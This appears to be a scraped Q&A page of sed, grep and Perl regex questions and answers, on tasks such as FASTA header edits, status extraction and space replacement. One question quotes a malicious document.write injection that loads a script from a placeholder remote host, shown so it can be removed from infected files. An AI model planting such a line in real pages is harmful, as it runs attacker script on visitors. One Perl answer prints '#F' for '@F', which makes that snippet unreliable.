How to find and replace with sed, except when between curly braces?

How to find and replace with sed, except when between curly braces? - sed

I have a command like this, it is marking words to appear in an index in the document:
sed -i "s/\b$line\b/\\\keywordis\{$line\}\{$wordis\}\{$definitionis\}/g" file.txt
The problem is, it is finding matches within existing matches, which means its e.g. "hello" is replaced with \keywordis{hello}{a common greeting}, but then "greeting" might be searched too, and \keywordis{hello}{a common \keywordis{greeting}{a phrase used when meeting someone}}...
How can I tell sed to perform the replacement, but ignore text that is already inside curly brackets?
Curley brackets in this case will always appear on the same line.

How can I tell sed to perform the replacement, but ignore text that is already inside curly brackets?
First tokenize input. Place something unique, like | or byte \x01 between every \keywordis{hello}{a common greeting} and store that in hold space. Something along s/\\the regex to match{hello}{a common greeting}/\x01&\x01/g'.
Ten iterate over elements in hold space. Use \n to separate elements already parsed from not parsed - input from output. If the element matches the format \keywordis{hello}{a common greeting}, just move it to the front before the newline in hold space, if it does not, perform the replacement. Here's an example: Identify and replace selective space inside given text file , it uses double newline \n\n as input/output separator.
Because, as you noted, replacements can have overlapping words with the patterns you are searching for, I believe the simplest would be after each replacement shuffling the pattern space like for ready output and starting the process all over for the current line.
Then on the end, shuffle the hold space to remove \x01 and newline and any leftovers and output.
Overall, it's Latex. I believe it would be simpler to do it manually.
By "eating" the string from the back and placing it in front of input/output separator inside pattern space, I simplified the process. The following program:
sed '
# add our input/output separator - just a newline
s/^/\n/
: loop
# l1000
# Ignore any "\keywords" and "{stuff}"
/^\([^\n]*\)\n\(.*\)\(\\[^{}]*\|{[^{}]*}\)$/{
s//\3\1\n\2/
b loop
}
# Replace hello followed by anthing not {}
# We match till the end because regex is greedy
# so that .* will eat everything.
/^\([^\n]*\)\n\(.*\)hello\([{}]*\)$/{
s//\\keywordis{hello}{a common greeting}\3\1\n\2/
b loop
}
# Hello was not matched - ignore anything irrelevant
# note - it has to match at least one character after newline
/^\([^\n]*\)\n\(.*\)\([^{}]\+\)$/{
s//\3\1\n\2/
b loop
}
s/\n//
' <<<'
\keywordis{hello}{hello} hello {some other hello} another hello yet
'
outputs:
\keywordis{hello}{hello} \keywordis{hello}{a common greeting} {some other hello} another \keywordis{hello}{a common greeting} yet

Related

Add words at beginning and end of a FASTA header line with sed

I have the following line:
>XXX-220_5004_COVID-A6
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGTCAAATCAATGATATGATTTTATCTCTTCTTAGTAAAGGTAGACTTATAATTAG
AGAAAACAAC
I would like to convert the first line as follows:
>INITWORD/XXX-220_5004_COVID-A6/FINALWORD
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGT...
So far I have managed to add the first word as follows:
sed 's/>/>INITTWORD\//I'
That returns:
>INITWORD/XXX-220_5004_COVID-A6
TTTATTTGACATGAGTAAATTTCCCCTTAAATTAAGGGGTACTGCTGTTATGTCTTTAAA
AGAAGGT
How can i add the FINALWORD at the end of the first line?

Just substitute more. sed conveniently allows you to recall the text you matched with a back reference, so just embed that between the things you want to add.
sed 's%^>\(.*\)%>INITWORD/\1/FINALWORD%I' file.fasta
I also added a ^ beginning-of-line anchor, and switched to % delimiters so the slashes don't need to be escaped.
In some more detail, the s command's syntax is s/regex/replacement/flags where regex is a regular expression to match the text you want to replace, and replacement is the text to replace it with. In the regex, you can use grouping parentheses \(...\) to extract some of the matched text into the replacement; so \1 refers to whatever matched the first set of grouping parentheses, \2 to the second, etc. The /flags are optional single-character specifiers which modify the behavior of the command; so for example, a /g flag says to replace every match on a line, instead of just the first one (but we only expect one match per line so it's not necessary or useful here).
The I flag is non-standard but since you are using that, I assume it does something useful for you.

Extracting substring from inside bracketed string, where the substring may have spaces

I've got an application that has no useful api implemented, and the only way to get certain information is to parse string output. This is proving to be very painful...
I'm trying to achieve this in bash on SLES12.
Given I have the following strings:
QMNAME(QMTKGW01) STATUS(Running)
QMNAME(QMTKGW01) STATUS(Ended normally)
I want to extract the STATUS value, ie "Ended normally" or "Running".
Note that the line structure can move around, so I can't count on the "STATUS" being the second field.
The closest I have managed to get so far is to extract a single word from inside STATUS like so
echo "QMNAME(QMTKGW01) STATUS(Running)" | sed "s/^.*STATUS(\(\S*\)).*/\1/"
This works for "Running" but not for "Ended normally"
I've tried switching the \S* for [\S\s]* in both "grep -o" and "sed" but it seems to corrupt the entire regex.

This is purely a regex issue, by doing \S you requested to match non-white space characters within (..) but the failing case has a space between which does not comply with the grammar defined. Make it simple by explicitly calling out the characters to match inside (..) as [a-zA-Z ]* i.e. zero or more upper & lower case characters and spaces.
sed 's/^.*STATUS(\([a-zA-Z ]*\)).*/\1/'
Or use character classes [:alnum:] if you want numbers too
sed 's/^.*STATUS(\([[:alnum:] ]*\)).*/\1/'

sed 's/.*STATUS(\([^)]*\)).*/\1/' file
Output:
Running
Ended normally

Extracting a substring matching a given pattern is a job for grep, not sed. We should use sed when we must edit the input string. (A lot of people use sed and even awk just to extract substrings, but that's wasteful in my opinion.)
So, here is a grep solution. We need to make some assumptions (in any solution) about your input - some are easy to relax, others are not. In your example the word STATUS is always capitalized, and it is immediately followed by the opening parenthesis (no space, no colon etc.). These assumptions can be relaxed easily. More importantly, and not easy to work around: there are no nested parentheses. You will want the longest substring of non-closing-parenthesis characters following the opening parenthesis, no mater what they are.
With these assumptions:
$ grep -oP '\bSTATUS\(\K[^)]*(?=\))' << EOF
> QMNAME(QMTKGW01) STATUS(Running)
> QMNAME(QMTKGW01) STATUS(Ended normally)
> EOF
Running
Ended normally
Explanation:
Command options: o to return only the matched substring; P to use Perl extensions (the \K marker and the lookahead). The regexp: we look for a word boundary (\b) - so the word STATUS is a complete word, not part of a longer word like SUBSTATUS; then the word STATUS and opening parenthesis. This is required for a match, but \K instructs that this part of the matched string will not be returned in the output. Then we seek zero or more non-closing-parenthesis characters ([^)]*) and we require that this be followed by a closing parenthesis - but the closing parenthesis is also not included in the returned string. That's a "lookahead" (the (?= ... ) construct).

substituting spaces for underscores using lookaheads in perl

I have files with many lines of the following form:
word -0.15636028 -0.2953045 0.29853472 ....
(one word preceding several hundreds floats delimited by blanks)
Due to some errors out of my control, the word sometimes has spaces in it.
a bbb c -0.15636028 -0.2953045 0.29853472 .... (several hundreds floats)
which I wish to substitute by underscores so to get:
a_bbb_c -0.15636028 -0.2953045 0.29853472 .... (several hundreds floats)
have tried for each line the following substitution code:
s/\s(?=(\s-?\d\.\d+)+)/_/g;
So lookarounds is apparently not the solution.
I'd be grateful for any clues.

Your idea for the lookahead is fine, but the question is how to replace only spaces in the part matched before the lookahead, when they are mixed with other things (the words, that is).
One way is to capture what precedes the first float (given by lookahead), and in the replacement part run another regex on what's been captured, to replace spaces
s{ (.*?) (?=\s+-?[0-9]+\.[0-9]) }{ $1 =~ s/\s+/_/gr }ex
Notes
Modifier /e makes the replacement part be evaluated as code; any valid Perl code goes
With s{}{} delimiters we can use s/// ones in the replacement part's regex
Regex in the replacement part, that changes spaces to _ in the captured text, has /r modifier so to return the modified string and leave the original unchanged. Thus we aren't attempting to change $1 (it's read only), and the modified string (being returned) is available as the replacement
Modifier /x allows use of spaces in patterns, for readability
Some assumptions must be made here. Most critical one is that the text to process is followed by a number in the given format, -?[0-9]+\.[0-9]+, and that there isn't such a number in the text itself. This follows the OP's sample and, more decidedly, the attempted solution
A couple of details with assumptions. (1) Leading digits are expected with [0-9]+\. -- if you can have numbers like .123 then use [0-9]*\. (2) The \s+ in the inner regex collapses multiple consecutive spaces into one _, so a b c becomes a_b_c (and not a__b_c)
In the lookahead I scoop up all spaces preceding the first float with \s+ -- and so they'll stay in front of the first float. This is as wanted with one space but with multiple ones it may be awkward
If they were included in the .*? capture (if the lookahead only has one space, \s) then we'd get an _ trailing the word(s). I thought that'd be more awkward. The ideal solution is to run another regex and clean that up, if such a case is possible and if it's a bother
An example
echo "a bbb c -0.15636028 -0.2953045" |
perl -wpe's{(.*?)(?=\s+-?[0-9]+\.[0-9])}{ $1 =~ s/\s+/_/gr }e'
prints
a_bbb_c -0.15636028 -0.2953045
Then to process all lines in a file you can do either
perl -wpe'...' file > new_file
and get a new_file with changes, or
perl -i.bak -wpe'...' file
to change the file in-place (that's -i), where .bak makes it save a backup.

Would something like this work for you:
s/\s+/_/g;
s/_(-?\d+\.)/ $1/g;

Use a negative lookahead to replace any spaces not followed by a float:
echo "a bbb cc -0.123232 -0.3232" | perl -wpe 's/ +(?! *-?\d+\.)/_/g'

Assuming from your comments your files look like that:
name float1 float2 float3
a bbb c -0.15636028 -0.2953045 0.29853472
abbb c -0.15636028 -0.2953045 0.29853472
a bbbc -0.15636028 -0.2953045 0.29853472
ab bbc -0.15636028 -0.2953045 0.29853472
abbbc -0.15636028 -0.2953045 0.29853472
Since you said in comments that the first field may contain digits, you can't use a lookahead that searches the first float to solve the problem. (you can nevertheless use a lookahead that counts the number of floats until the end of the line but it isn't very handy).
What I suggest is a solution based on fields number defined by the header first line.
You can use the header line to know the number of fields and replace spaces at the begining of other lines until the number of fields is the same.
You can use perl command line as awk like that:
perl -MEnglish -pae'$c=scalar #F if ($NR==1);for($i=0;$i<scalar(#F)-$c;$i++){s/\s+/_/}' file
The for loop counts the difference between the number of fields in the first row (stored in $c) and in the current line (given by scalar(#F) where #F is the fields array), and repeats the substitution.
The a switches the perl command line in autosplit mode and the -MEnglish makes available the number row variable as $NR (like the NR variable in awk).
It's possible to shorten it like that:
perl -pae'$c=#F if $.<2;$i=#F-$c;s/\s+/_/ while $i--' file

How to delete multiple lines from text file, including matched line?

I found some malicious JavaScript inserted into dozens of files.
The malicious code looks like this:
/*123456*/
document.write('<script type="text/javascript" src="http://maliciousurl.com/asdf/KjdfL4ljd?id=9876543"></script>');
/*/123456*/
Some kind of opening tag, the document.write that inserts the remote script, a seemingly empty line, and then their "closing tag."
In a comment on this Stack Overflow answer I found out how to delete a single line in a single file.
sed -i '/pattern to match/d' ./infile
But I need to delete one line before, and two lines after, and again it is in at least a few dozen files.
So I think I could perhaps use grep -lr to find the file names, then pass each one to sed and somehow remove the matching line, as well as one before and 2 after (4 lines total). Pattern to match could be "\n*\nmaliciousurl\n\n*\n"?
I also tried this, trying to replace the pattern with empty string. The .* are the hex numbers in the opening/closing tags, and also the stuff between the tags.
sed -e '\%/\*.*\*/.*maliciousurl.*/\*/.*\*/%,\%%d' test.js

You need to match on the begin and end comments, not the document.write line:
sed -e '\%/\*123456\*/%,\%/\*/123456\*/%d'
This uses the % symbol in place of the more normal / to delimit the patterns, which is usually a good idea when the pattern contains slashed and doesn't contain % symbols. The leading \ tells sed that the following character is the pattern delimiter. You can use any character (except backslash or newline) in place of the %; Control-A is another good one to consider.
From the sed manual on Mac OS X:
In a context address, any character other than a backslash ('\') or newline
character may be used to delimit the regular expression. Also, putting a backslash character before the delimiting character causes the character to be
treated literally. For example, in the context address \xabc\xdefx, the RE
delimiter is an 'x' and the second 'x' stands for itself, so that the regular expression is 'abcxdef'.
Now, if in fact your pattern isn't as easily identified as the /*123456*/ you show in the example, then maybe you are forced to key off the malicious URL. However, in that case, you cannot use sed very easily; it cannot do relative offsets (/x/+1 is not allowed, let alone /x/-1). At that point, you probably fall back on ed (or perhaps ex):
ed - $file <<'EOF'
g/maliciousurl.com/.-1,.+2d
w
q
EOF
This does a global search for the malicious URL, and with each occurrence, deletes from the line before the current line (.-1) to two lines after it (.+2). Then write the file and quit.

meaning of the following regular expressions written in perl

Here is a piece of code
while($l=~/(\\\s*)$/) {
statements;
}
$l contains a line of text taken form file, in effect this code is for go through lines in file.
Questions:
I don't clearly understand what the condition in while is doing. I think it is trying to match group of \ followed by some number of white spaces at the end of line and loop should stop whenever a line ends with \ and may be some white spaces. I am not sure of it.
I came across statement $a ~= s/^(.*$)/$1/ . What I understand that ^ will force matching at the beginning of string, but in (.*$) would mean match all the characters at the end of string . Dose it mean that the statement is trying to find if any group of character at the end is same as group of character in the beginning of text ?

It is interesting to note that this statement:
while ( $l =~ /(\\\s*)$/ ) {
Is an infinite loop unless $l is altered inside the loop so that the regex no longer matches. As has already been mentioned by others, this is what it matches:
( ... ) a capture group, captures string to $1 (that's the number one, not lower case L)
\\ matches a literal backslash
\s* matches 0 or more whitespace characters.
$ matches end of line with optional newline.
Since you do not have the /g modifier, this regex will not iterate through matches, it will simply check if there is a match, resetting the regex each iteration, thereby causing an endless loop.
The statement
$a ~= s/^(.*$)/$1/
Looks rather pointless. It captures a string of characters up until end of string, then replaces it with itself. The captured text is stored in $1 and is simply replaced. The only marginally useful thing about this regex is that:
It matches up until newline \n, and nothing further, which may be of some use to a parser. A period . matches any character except newline, unless the /s modifier is present on the regex.
It captures the line in $1 for future use. However, a simple /^(.*$)/ would do the same.

1. the while
Usually while (regex) is used with the /g modifier, otherwise, if it matches, you get an infinite loop (unless you exit the loop, like using last).
statements would be executed continuously in an infinite loop.
In your case, adding the g
while($l=~/(\\\s*)$/g)
will have the while make only one loop, due to the $ - making a match unique (whatever matches up to the end of string is unique, as $ marks the end, and there is nothing after...).
2. $a ~= s/^(.*$)/$1/
This is a substitution. If the string ^.*$ matches (and it will, since ^.*$ matches (almost, see comment) anything) it is replaced with... $1 or what's inside the (), ie itself, since the match occurs from 1st char to the end of string
^ means beginning of string
(.*) means all chars
$ end of string
so that will replace $a with itself - probably not what you want.

it matches a literal backslash followed by 0 or more spaces followed by the end of the line.

it executes statements for all the lines in that text file that contain a \, followed by zero or more spaces ( \s* ), at the end of the line ($).

It matches lines that end with a backslash character, ignoring any trailing whitespace characters.
Ending a line with a backslash is used in some languages and data files to indicate that the line is being continued on the next line. So I suspect this is part of a parser that merges these continuation lines.
If you enter a regular expression at RegExr and hover your mouse over the pieces, it displays the meaning of each piece in a tooltip.

(\\\s*)$ this regex means --- a \ followed by zero or more number of white space characters which is followed by end of the line. Since you have your regex in (...), you can extract what you matched using $1, if you need.
http://rubular.com/r/dtHtEPh5DX
EDIT -- based on your update
$a ~= s/^(.$)/$1/ --- this is search and replace. So your regex matches a line which contains exactly one character (since you use . http://www.regular-expressions.info/dot.html), except a new-line character. Since you use (...), the character which matched the regex is extracted and stored in variable a
EDIT -- you changed your regex so here is the updated answer
$a ~= s/^(.*$)/$1/ -- same as above except now it matches zero or more characters (except new-line)